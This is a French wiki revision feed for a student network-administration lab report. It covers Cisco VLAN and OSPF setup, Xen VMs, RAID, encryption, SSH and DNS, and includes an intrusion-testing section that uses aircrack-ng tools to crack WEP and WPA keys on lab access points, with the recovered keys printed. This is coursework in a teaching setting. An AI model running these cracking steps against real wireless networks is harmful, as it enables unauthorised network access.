== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :&lt;br /&gt;
    fdisk -l&lt;br /&gt;
    #sélection de la clé à formater&lt;br /&gt;
    fdisk /dev/sdb&lt;br /&gt;
    o #creation table MBR&lt;br /&gt;
    n #creation nouvelle partition&lt;br /&gt;
    w #écriture sur la clé&lt;br /&gt;
&lt;br /&gt;
La commande crypsetup utilisée est la suivante :&lt;br /&gt;
    cryptsetup open --type plain /dev/sdb1 encryptedDevice&lt;br /&gt;
    #s'en suit une demande de mdp&lt;br /&gt;
&lt;br /&gt;
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :&lt;br /&gt;
    mkfs.ext4 /dev/mapper/encryptedDevice&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57699</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57699"/>
				<updated>2022-01-10T16:01:51Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 1H&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site (&lt;br /&gt;
                         12      ; serial number YYMMDDNN&lt;br /&gt;
                         1H           ; Refresh&lt;br /&gt;
                         1H            ; Retry&lt;br /&gt;
                         1D          ; Expire&lt;br /&gt;
                         1H           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
          IN      NS      ns.anosteke59.site.&lt;br /&gt;
          IN      NS      ns6.gandi.net. &lt;br /&gt;
 www      IN      A       193.48.57.182&lt;br /&gt;
 ns       IN      CNAME   WWW&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57694</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57694"/>
				<updated>2022-01-10T15:57:47Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Sécurisation de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 1H&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site (&lt;br /&gt;
                         12      ; serial number YYMMDDNN&lt;br /&gt;
                         1H           ; Refresh&lt;br /&gt;
                         1H            ; Retry&lt;br /&gt;
                         1D          ; Expire&lt;br /&gt;
                         1H           ; Min TTL&lt;br /&gt;
